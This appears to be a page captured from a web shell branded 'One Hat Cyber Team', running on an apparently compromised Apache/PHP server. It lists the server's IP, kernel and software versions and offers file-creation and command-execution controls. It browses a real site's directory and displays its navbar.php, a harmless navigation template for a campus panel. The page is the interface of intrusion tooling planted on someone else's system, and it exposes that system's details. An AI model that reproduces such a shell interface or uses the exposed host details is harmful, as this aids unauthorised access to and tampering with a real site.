One Hat Cyber Team
Your IP :
104.23.197.102
Server IP :
104.21.51.23
Server :
Linux 128-201-239-36.cprapid.com 3.10.0-1160.41.1.el7.x86_64 #1 SMP Tue Aug 31 14:52:47 UTC 2021 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
juscatamarca
/
www
/
campusjxj
/
includes
/
layout
/
View File Name :
navbar.php
<?php declare(strict_types=1); $user = current_user(); $navbarTitle = $navbarTitle ?? 'Panel'; $displayName = trim((string) ($user['first_name'] ?? '') . ' ' . (string) ($user['last_name'] ?? '')); ?> <header class="topbar"> <div class="d-flex align-items-center gap-2"> <button class="btn btn-sm btn-outline-success d-lg-none" id="sidebarToggle" type="button"> <p class="mb-0 fw-semibold"><?= e($displayName !== '' ? $displayName : 'Usuario') ?></p> </button> <h1 class="h5 mb-0 fw-semibold"><?= e($navbarTitle) ?></h1> </div> <div class="d-flex align-items-center gap-3"> <div class="text-end d-none d-sm-block"> <p class="mb-0 fw-semibold"><?= e($displayName !== '' ? $displayName : 'Usuario') ?></p> <small class="text-muted"><?= e(ui_role_label((string) ($user['role'] ?? ''))) ?></small> </div> <a class="btn btn-sm btn-success" href="<?= e(base_url('logout.php')) ?>"> <i class="fa-solid fa-right-from-bracket me-1"></i>Salir </a> </div> </header>